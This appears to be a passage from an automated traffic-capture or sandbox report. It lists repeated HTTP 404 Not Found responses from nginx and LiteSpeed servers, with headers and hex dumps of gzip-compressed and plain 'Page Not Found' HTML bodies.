            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:31:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:31:29 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:31:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:31:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 